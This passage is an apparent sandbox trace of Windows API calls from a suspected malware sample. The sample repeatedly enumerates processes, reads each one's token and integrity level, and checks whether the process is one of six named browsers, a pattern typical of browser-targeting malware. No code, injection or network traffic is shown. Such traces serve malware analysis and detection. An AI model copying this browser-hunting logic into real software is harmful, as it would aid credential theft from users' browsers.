TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.943] GetLastError () returned 0x7a [0230.943] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.943] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.943] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.943] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0230.943] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0230.943] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0230.943] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0230.943] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0230.943] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0230.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0230.943] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.943] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.943] GetLastError () returned 0x7a [0230.943] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.943] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.943] CloseHandle (hObject=0x340) returned 1 [0230.943] CloseHandle (hObject=0x548) returned 1 [0230.943] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.943] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.944] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.944] GetLastError () returned 0x7a [0230.944] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.944] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.944] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.944] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0230.944] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0230.944] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0230.944] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0230.944] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0230.944] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0230.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0230.944] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.944] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.944] GetLastError () returned 0x7a [0230.944] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.944] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.944] CloseHandle (hObject=0x340) returned 1 [0230.944] CloseHandle (hObject=0x548) returned 1 [0230.944] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.944] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.944] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.944] GetLastError () returned 0x7a [0230.944] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.944] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.944] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.945] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0230.945] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0230.945] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0230.945] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0230.945] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0230.945] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0230.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x548 [0230.945] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.945] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.945] GetLastError () returned 0x7a [0230.945] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.945] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.945] CloseHandle (hObject=0x340) returned 1 [0230.945] CloseHandle (hObject=0x548) returned 1 [0230.945] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.945] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.945] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.945] GetLastError () returned 0x7a [0230.945] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.945] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.945] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.945] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0230.945] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0230.945] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0230.945] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0230.945] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0230.945] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0230.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0230.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0230.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0230.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0230.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0230.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0230.946] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.946] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.946] GetLastError () returned 0x7a [0230.946] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.946] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.946] CloseHandle (hObject=0x340) returned 1 [0230.946] CloseHandle (hObject=0x548) returned 1 [0230.946] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.946] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.946] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.946] GetLastError () returned 0x7a [0230.946] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.946] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.946] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.946] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0230.946] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0230.946] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0230.946] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0230.946] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0230.947] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0230.947] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.947] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0232.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc0a0) returned 0xc0000004 [0232.980] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0232.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0232.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0232.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0232.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0232.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0232.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0232.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0232.984] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.984] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.984] GetLastError () returned 0x7a [0232.984] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.984] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.984] CloseHandle (hObject=0x340) returned 1 [0232.985] CloseHandle (hObject=0x548) returned 1 [0232.985] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.985] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.985] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.985] GetLastError () returned 0x7a [0232.985] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.985] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.985] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.986] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0232.986] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0232.986] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0232.986] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0232.986] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0232.986] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0232.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0232.986] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.986] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.986] GetLastError () returned 0x7a [0232.987] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.987] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.987] CloseHandle (hObject=0x340) returned 1 [0232.987] CloseHandle (hObject=0x548) returned 1 [0232.987] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.987] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.987] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.987] GetLastError () returned 0x7a [0232.987] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.987] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.987] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.988] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0232.988] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0232.988] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0232.988] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0232.988] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0232.988] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0232.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0232.988] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.988] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.988] GetLastError () returned 0x7a [0232.988] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.988] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.988] CloseHandle (hObject=0x340) returned 1 [0232.988] CloseHandle (hObject=0x548) returned 1 [0232.988] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0232.989] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0232.989] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0232.989] GetLastError () returned 0x7a [0232.989] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0232.989] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0232.989] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0232.989] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0232.989] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0232.989] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0232.989] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0232.989] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0232.989] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0232.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0232.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0232.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0232.990] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0232.990] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0232.990] GetLastError () returned 0x7a [0232.990] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0232.990] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0232.990] CloseHandle (hObject=0x340) returned 1 [0232.990] CloseHandle (hObject=0x548) returned 1 [0232.990] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, 